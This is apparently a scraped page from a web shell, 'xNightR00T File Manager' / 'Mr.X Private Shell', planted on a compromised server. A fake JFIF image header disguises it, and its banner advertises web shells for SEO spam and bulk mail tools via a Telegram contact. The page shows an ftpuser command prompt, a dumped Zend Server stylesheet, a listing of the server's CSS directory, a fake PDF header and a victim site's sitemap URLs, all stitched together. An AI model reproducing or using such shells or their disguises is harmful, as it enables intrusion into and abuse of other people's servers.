xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
/**
 * Styles related to the layout of the GUI. 
 * The top bar, the main menu and the page wrapper
 */
 
body {
    background-color: #ffffff;
    margin: 0;
    font-family: 'Open Sans', sans-serif;
    font-size: 13px;
    font-weight: normal;
    color: #404040;
    min-height: 100%;
    height: 100%;
}


#page-wrapper {
    height: 100%;
}

/*************** TOP BAR ******************/
.topbar {
	top: 0;
	left: 0;
	right: 0;
	z-index: 10000;
	margin: 0;
	height: 36px;
	overflow: visible;
	position: fixed;
}
.topbar a {
	color: #bfbfbf;
	text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
}
#notification-msg-messages .description a {
	color: #0069d6;
    text-decoration: none;
    line-height: inherit;
    font-weight: inherit;
    position: initial;
    font-size: inherit;
    display: inline;
}
.topbar ul {
	padding: 0;
	width: 100%;
	font-size: 0;
	display: block;
	margin: 0 10px 0 0;
}
.topbar ul li {
	display: block;
	float: left;
}
.topbar ul li a {
	display: block;
	line-height: 19px;
	text-decoration: none;
}
.topbar ul li a:hover {
	color: #ffffff;
	text-decoration: none;
}
.topbar .topNav {
	height: 36px;
	background: #000;
	width: 100%;
}
.topbar .topNav ul {
	height: 100%;
}
.topbar .topNav ul li {
	display: inline-block;
}
.topbar .topNav ul li a {
	position: relative;
	background: none;
	color: #fff;
	font-size: 14px;
	line-height: 11px;
	height: 11px;
	margin-top: 3px;
}
.topbar .topNav ul li i.glyphicons::before {
	top: 7px;
	margin-left: 5px;
	font-size: 15px;
	margin-right: 5px;
}


/************** NOTIFICATIONS ****************/

#notification-count,#a-notification-count {
    position: absolute;
    top: 4px;
    left: 4px;
	
    width: 16px;
    height: 16px;
    line-height: 16px;
	
    background: #44AFE3;
    color: black;
	
    font-size: 10px;
    text-align: center;
	
    border-radius: 10px;
}

#notification-messages::before,#a-notification-messages::before {
    content:"";
    position:absolute;
    top: -10px;
    right: 10px;
    width: 0px;
    height: 0;
    border-left: 10px solid transparent;
    border-right: 10px solid transparent;
    border-bottom: 10px solid #3B98C5;
}
#notification-messages,#a-notification-messages {
    right: 150px;
    position: fixed;
    top: 35px;
    width: 450px;
    background: #FFF;
    text-align: left;
    border: 1px solid rgba(127, 127, 127, 0.55);
    z-index: 210;
    /*transition: all 1s;*/
}

#notification-messages #pane-title,#a-notification-messages #pane-title {
    background: rgb(59, 152, 197);
    font-weight: bold;
    padding: 4px 8px;
    color: #fff;
}

#notification-messages .message,#a-notification-messages .message {
    position: relative;
    padding: 10px;
    margin: 2px 0;
    background-color: #EEE;
}

#notification-messages .icon,#a-notification-messages .icon {margin-top: -2px;color: gray;}

#notification-messages .body,#a-notification-messages .body {
    /* display: inline-block; */
    /* width: 384px; */
}

#notification-messages .title,#a-notification-messages .title {
    font-weight: bold;
    margin: 10px 0px;
    font-size: 13px;
}

#notification-messages .description,#a-notification-messages .description {
    margin: 10px 0px 10px 32px;
    width: 355px;
}

#notification-messages .dismiss,#a-notification-messages .dismiss {
    position: absolute;
    top: 1px;
    right: 5px;
    width: 21px;
    height: 21px;
    cursor: pointer;
    transition: opacity 0.3s;
    opacity: 0.8;
}

#notification-messages .controls,#a-notification-messages .controls {
    margin: 20px 0px 0px;
}

#notification-messages .controls .buttons,#a-notification-messages .controls .buttons {
    text-align: right;
    white-space: nowrap;
}

/************ MAIN MENU BUTTONS ****************/

#main-menu-buttons {
    position: absolute;
    right: 0px;
    top: 0px;
    height: 36px;
}

#main-menu-buttons ul li {
    display: inline-block;
    font-size: 12px;
    transition: background 0.3s;
    vertical-align: top;
}

.topNav #main-menu-buttons li:hover {
    background: rgba(72,141,182,0.65);
}

.topNav #main-menu-buttons li.not-clickable:hover {
    background: transparent;
    cursor: default;
}

.topNav #main-menu-buttons li  i.glyphicons::before {
    font-size: 20px;
}

#main-menu-buttons a {
    display: block;
    height: 33px;
    outline: 0;
}



.restart-dismiss {
    height: 21px;
    padding-left: 5px;
    cursor: pointer;
}

.restart-tooltip {
    padding: 6px;
    padding-right: 10px;
    width: 340px;
    maring-right: 3px;
}

.floating-tip {
    -moz-box-shadow: -3px 3px 4px rgba(128, 128, 128, 0.35);
    -webkit-box-shadow: -3px 3px 4px rgba(128, 128, 128, 0.35);
    box-shadow: -3px 3px 4px rgba(128, 128, 128, 0.35);
}

.restart-tooltip div.body {
    margin-top: 28px;
}

.restart-tooltip div.headline {
    height: 20px;
    padding-left: 5px;
    background: transparent url("/ZendServer/images/error-message-icon.png") no-repeat;
}

.restart-tooltip h3 {
    margin-top: 5px;
    margin-left: 22px;
}


/* fixed bug #ZSRV-7784 to make the help icon always looking as active button - icon-over */
#main-menu-profile-btn {
    background: url('/ZendServer/images/icons/profile-icon.png') right top no-repeat;
}

#main-menu-settings-btn {
    background: url('/ZendServer/images/icons/settings-icon.png') right top no-repeat;
}

@-moz-keyframes spin {
    100% {
        -moz-transform: rotate(-360deg);
    }
}

@-webkit-keyframes spin {
    100% {
        -webkit-transform: rotate(-360deg);
    }
}

@keyframes spin {
    100% {
        -webkit-transform: rotate(-360deg);
        transform: rotate(-360deg);
    }
}

#main-menu-restart-btn.restarting i.glyphicons::before,
#main-menu-restart-btn.active i.glyphicons::before {
    color: #FFA500;
}

#main-menu-restart-btn.restarting i:before {
    -webkit-animation: spin 2s infinite linear;
    -moz-animation: spin 2s infinite linear;
    -o-animation: spin 2s infinite linear;
    animation: spin 2s infinite linear;
}

#main-menu-notification-holder {
    width: 240px;
    height: 300px;
    position: absolute;
    top: 30px;
    right: 100px;
    background: #339;
    z-index: 210;
	/* CURRENTLY INVIS TILL WE GOOD TO GO AGAIN*/
    display: none;
}

/*************** /TOP BAR ******************/



#wrapper {
    height: 100%;
}

#side-bar {
    position: fixed;
    top: 35px;
    width: 200px;
    background: #585858;
    bottom: 0;
	z-index: 101;
}

.side-bar-open-close {
	position: absolute;
	background: rgba(88, 88, 88, 0.1);
	height: 200px;
	width: 20px;
	z-index: -1;
	right: 0px;
	top: 30%;
	border-radius: 0 10px 10px 0;
	text-align: center;
	line-height: 200px;
	color: #DDD;
	
	transition: all 0.3s;
}
.side-bar-open-close.side-bar-open-close-displayed {
	right: -20px;
}

.side-bar-open-close i {
	opacity: 0;
	padding: 3px;
	background: #DDD;
	color: #222;
	border-radius: 10px;
	transition: all 0.3s;
}

.side-bar-open-close.side-bar-open-close-displayed i {
	opacity: 1;
}

.side-bar-open-close:hover {
	background: rgba(88,88,88, 0.5);
	color: #FFF;
}

#main-menu a {
  border-bottom: 1px solid #464646;
  display: block;
  text-decoration: none;
  padding: 4px;
  background-color: #3B3B3B;
  line-height: 29px;
  color: #e4e4e4;
  outline: 0;
  position: relative;
  font-size: 14px;
  padding-left: 43px;
  transition: background 0.3s, color 0.3s;
  background: #3B3B3B;
  transform: translateZ(0);
  
  white-space: nowrap;
  text-overflow: ellipsis;
}
#main-menu a:hover {
  color: #e4e4e4;
  outline: 0;
  position: relative;
  font-size: 14px;
  background: #585858;
}
#main-menu a:active {
  color: #e4e4e4;
  outline: 0;
  position: relative;
  font-size: 14px;
}
#main-menu a i.glyphicons {
  position: absolute;
  left: 4px;
}
#main-menu a i.glyphicons.children-chevron {
  left: auto;
  right: 1px;
  top: 5px;
}
#main-menu a i.glyphicons.children-chevron::before {
  font-size: 15px;
  color: #A3A3A3;
  transition: all 0.5s;
}
#main-menu nav > a {
  background: #585858;
  border: 0;
}
#main-menu nav > a:hover, #main-menu nav > a.active {
  background: #a3a3a3;
  color: #000;
}
#main-menu > div {
	overflow: hidden;
}
#main-menu > div > a > i::before {
  font-size: 17px;
  color: #44afe5;
}
#main-menu > div > nav {
  overflow: hidden;
}
#main-menu > div.opened a i.glyphicons.children-chevron::before {
  -ms-transform: rotate(90deg);
  /* IE 9 */
  -webkit-transform: rotate(90deg);
  /* Chrome, Safari, Opera */
  transform: rotate(90deg);
}
#main-menu > div.active > nav {
  display: block;
}
#main-menu > .active > a {
  font-weight: bold;
}



div#main-wrapper {
    position: relative;
	min-width: 1220px;
}

#side-bar-beneath {
	position: relative;
	width: 200px;
	top: 35px;
	z-index: 90;
	float: left;
	background: #585858;
}

#main-container.super-container {
	float: left;
	position: relative;
	min-width: 1170px;
	margin-left: 10px;
	width: calc(100% - 210px);
	padding: 45px 20px 10px 0px;
}

#main-container {
    padding: 0;
    box-sizing: border-box;
    width: auto;
}

#main-container header h1 {
    margin-top: 10px;
    font-size: 38px;
    font-weight: lighter;
    font-family: "Lucida Grande", "Lucida Sans Unicode", Arial, Helvetica, sans-serif;
}

#main-container header h1 small {
    font-size: 18px;
    font-weight: lighter;
    font-family: "Lucida Grande", "Lucida Sans Unicode", Arial, Helvetica, sans-serif;
}

.logo-placeholder {
    position: absolute;
    top: 0px;
    left: 25px;
    z-index: 9;
}

.logo {
    height: 50px;
    display: inline;
}

.edition {
    display: inline;
    margin: 4px 0 0 -13px;
}

.frame-top-edition {
    margin: 0 6px 0 0;
}


#host_and_env_title {
	white-space: nowrap;
	overflow: hidden;
	text-overflow: ellipsis;
	text-align: center;
	
	position: absolute;
	top: 0;
	left: calc(50% - 100px);
	
	width: 200px;
	height: 36px;
	
	font-size: 14px;
	line-height: 36px;
	color: #FFF;
}
#host_and_env_login_title {
	white-space: nowrap;
	overflow: hidden;
	text-overflow: ellipsis;
	text-align: center;
	height: 36px;
	font-size: 14px;
	line-height: 36px;
	color: #FFF;
}
#host_and_env_title .environment-icon,
#host_and_env_login_title .environment-icon {
	font-size: 18px;
	vertical-align: middle;
}

#host_and_env_title .host_and_env_title_edit_link {
	opacity: 0.3;
}
#host_and_env_title:hover .host_and_env_title_edit_link {
	opacity: 1;
}

#clock-placeholder {
    display: inline;
    margin: 8px 0;
    float: left;
    width: 68px;
    font-weight: bold;
    color: #fff;
    font-size: 14px;
    text-align: center;
}



/****************************************************************************/
/****************************************************************************/
/******************** Minimal version (only the icons) **********************/
/****************************************************************************/
/****************************************************************************/

#wrapper.minimal #side-bar {
	width: 40px;
}

#wrapper.minimal #side-bar-beneath {
	width: 40px;
}

#wrapper.minimal #main-container.super-container {
	width: calc(100% - 50px);
	min-width: 0px;
}

#wrapper.minimal #side-bar #main-menu-fast-navigation.fast_navigation_focused {
	width: 240px;
	position: relative;
	background: #3B3B3B;
}

#wrapper.minimal #side-bar #main-menu i[class*="chevron"] {
	display: none;
}

#wrapper.minimal .submenu-cat-name {
	display: block;
	height: 38px;
	line-height: 38px;
	border-bottom: 1px solid #666;
	padding-left: 5px;
	box-sizing: border-box;
	color: #44AFE5;
	background: #585858;
	cursor: default;
}

#wrapper.minimal #main-menu > div.active > a,
#wrapper.minimal #main-menu > div.opened > a {
	background: #585858;
}

#wrapper.minimal #main-menu > div a {
	padding-left: 10px;
}
#wrapper.minimal #main-menu > div > a {
	padding-left: 0;
}
#wrapper.minimal #main-menu > div > a span {
	visibility: hidden;
}

#wrapper.minimal #main-menu > div > nav {
	display: none;
	position: absolute;
	width: 200px;
	z-index: 10;
	left: 40px;
	margin-top: -38px;
}
#wrapper.minimal #main-menu > div > nav a {
	padding-left: 15px;
}
#wrapper.minimal #main-menu > div:hover > nav {
	display: block;
}

.grid-application-icon {
	max-width: 20px;
	max-height: 20px;
	vertical-align: middle;
}

.muted-wrapper {
    opacity: 0.3;
}

.muted {
    color: #AAA;
}
a.button {
    font-family: 'Open Sans', sans-serif !important;
    background: #E3E3E3 !important;
    height: 29px !important;
    border: 1px solid #CCC !important;
    color: #000 !important;
    padding: 3px 10px 4px !important;
    font-size: 13px !important;
    -moz-border-radius: 2px !important;
    -webkit-border-radius: 2px !important;
    -khtml-border-radius: 2px !important;
    border-radius: 2px !important;
    display: inline !important;
    text-shadow: none;
    margin-right: 3px;
}
.settings-error {
    display: inline-block;
    color: red;
    margin-left: 10px;
}
div.graph-blocker {
	position: absolute;
    width: 70%;
    height: 250px;
    z-index: 1;
	font-size: 58px;
	font-family: 'Open Sans', sans-serif;
	font-weight: bold;
    background: rgba(255, 255, 255, 0.6);
    text-align: center;
    line-height: 250px;
	color: #dddd;
}

Filemanager

Name Type Size Permission Actions
devbar Folder 0755
admin.css File 10.21 KB 0644
appList.css File 3.72 KB 0644
azure.css File 89 B 0644
bootstrap.css File 3.09 KB 0644
charts.css File 267 B 0644
codetracing.css File 11.04 KB 0644
configImport.css File 277 B 0644
configuration.css File 4.1 KB 0644
dashboard.css File 19 B 0644
datepicker_dashboard.css File 5.42 KB 0644
dcpulse.css File 7.75 KB 0644
devbar-azure.css File 3.04 KB 0644
devbar-embedded.css File 28.83 KB 0644
devbar-iframe.css File 4.09 KB 0644
devbar-zray-standalone.css File 1.56 KB 0644
devbar.css File 150.63 KB 0644
error.css File 936 B 0644
events.css File 244 B 0644
expired.css File 6.84 KB 0644
filter.css File 7.95 KB 0644
glyphicons.css File 45.76 KB 0644
guidePageZrayStandalone.css File 1.26 KB 0644
guidepage.css File 16.6 KB 0644
history.css File 6.39 KB 0644
icons.css File 1.12 KB 0644
ipwidget.css File 98 B 0644
issueDetails.css File 3.65 KB 0644
jobqueue_settings.css File 448 B 0644
jobs.css File 1.53 KB 0644
jqpulse.css File 13.77 KB 0644
layout.css File 12.83 KB 0644
libsList.css File 508 B 0644
license.css File 2.48 KB 0644
login.css File 5.09 KB 0644
logs.css File 6.97 KB 0644
monitor-rules.css File 1.37 KB 0644
monitor-settings.css File 1013 B 0644
monitorRule.css File 6.43 KB 0644
pageCache.css File 4.47 KB 0644
plugins.css File 13.78 KB 0644
prereq.css File 519 B 0644
recurringJob.css File 2.43 KB 0644
rulesList.css File 1.14 KB 0644
serverInfo.css File 1.49 KB 0644
servers.css File 607 B 0644
sessionClustering.css File 704 B 0644
simplemodal.css File 975 B 0644
spinner-input.css File 765 B 0644
spinner.css File 1.3 KB 0644
studio.css File 17.42 KB 0644
style.css File 82.54 KB 0644
tags.css File 477 B 0644
toast.css File 1.84 KB 0644
ui-grid-zs.css File 5.07 KB 0644
uploader.css File 1.78 KB 0644
urlinsight.css File 16.69 KB 0644
urlinsightRules.css File 357 B 0644
vhosts.css File 7.26 KB 0644
webApi.css File 251 B 0644
wizard.css File 15.21 KB 0644
z-ray-libs.css File 210.67 KB 0644
z-ray-libs.min.css File 187.41 KB 0644
zgrid.css File 13.86 KB 0644
zmenu.css File 763 B 0644
zray-standalone.css File 810 B 0644
zs-reset.css File 5.56 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml